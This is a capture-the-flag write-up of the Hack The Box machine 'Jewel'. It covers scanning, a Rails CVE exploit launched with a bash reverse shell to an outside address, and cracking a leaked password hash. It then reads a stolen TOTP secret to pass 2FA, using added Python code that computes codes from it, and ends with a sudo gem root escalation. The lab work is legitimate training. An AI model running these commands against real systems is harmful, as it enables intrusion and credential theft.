Jewel ~ Hack The Box

Do not stop enumerating~!

Prerequisite

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

echo "10.10.10.211	jewel.htb" >> /etc/hosts
hosts file entry

Okay now onto the hacking!


Reconnaissance

As always, I started off with an NMAP scan against the machine.

nmap -Pn -sC -sV -A -p- -oN initial jewel.htb
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
|   256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_  256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open  http    Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open  http    nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!

Scanning & Enumeration

Based on the scan that was run, I realized that port 8000 was running a web server (gitweb), and port 8080 was serving the blog web app!

Enumerating further revealed the app that was running and its version.

  • Rails 5.2.2.1

I was able to find an existing CVE for this version of rails and a POC.

Exploitation

With the help of the POC, I was able to gain a minimal shell on the remote box that was running rails 5.2.2.1.

First I had to create an account on the blog, which was running on port 8080.

Once I had that account created, I was ready to run the exploit.

┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
└─# python3 exploit.py 10.10.10.211 8080 [email protected] nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"
User.txt flag

I was able to gain a stable shell to the user account.

Privilege Escalation

For this, I utilized Linpeas as I always do! The privesc script returned a password hash belonging to bill.

[+] Searching specific hashes inside files - less false positives (limit 70)
/home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW

I headed off to crack the password with my trusty dictionary from seclists and good ol' john!

┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
└─# john password.hash -w=passwd.dict 

Following that, I tried to run sudo -l to see which binaries bill could run with sudo.

However, I was hit with a 2FA request which prevented me from running the command. After looking around for a bit, I realized that there was a .google_authenticator file in the home directory of bill.

[email protected]:~$ cat .google_authenticator 
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH

I then activated the authenticator on my phone and was able to get it working!~
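To show why this file needs to stay private, here is an added Python example (not from the original writeup) that parses the ~/.google_authenticator layout shown above and computes the RFC 6238 code from the secret. It uses the RFC's published test key in a constructed sample file rather than the secret from the box, and includes a permission check for the file.

```python
import base64
import hmac
import struct
from hashlib import sha1
from pathlib import Path

# Constructed sample in the layout of ~/.google_authenticator: the base32
# secret on the first line, then option lines that begin with a double quote.
SAMPLE_FILE = "\n".join([
    "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ",  # RFC 6238 test key, base32-encoded
    '" WINDOW_SIZE 17',
    '" TOTP_AUTH',
])


def parse_google_authenticator(text):
    """Return (secret, options, scratch_codes) from a .google_authenticator file."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    secret, options, scratch = lines[0], {}, []
    for line in lines[1:]:
        if line.startswith('"'):
            parts = line[1:].split()
            options[parts[0]] = parts[1] if len(parts) > 1 else True
        else:
            scratch.append(line)  # emergency scratch codes, if any were kept
    return secret, options, scratch


def totp(secret_b32, unix_time, step=30, digits=6):
    """RFC 6238 TOTP (HMAC-SHA1) for a base32 secret at a given UNIX time."""
    padded = secret_b32.upper() + "=" * (-len(secret_b32) % 8)
    key = base64.b32decode(padded)
    counter = struct.pack(">Q", int(unix_time) // step)
    mac = hmac.new(key, counter, sha1).digest()
    offset = mac[-1] & 0x0F  # dynamic truncation, as in RFC 4226
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def readable_by_others(path):
    """True if group/other bits are set; the secret file should be 0400 or 0600."""
    return (Path(path).stat().st_mode & 0o077) != 0
```

Anyone who can read the file can run totp() against the secret, which is why the PAM second factor only helps while the file's permissions hold.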

And finally, I was able to run sudo -l using bill's account without any issues.

Now that I knew bill could run gem with sudo privileges, all there was left to do was head to GTFOBins and get root!

sudo gem open -e "/bin/sh -c /bin/sh" rdoc

rooty!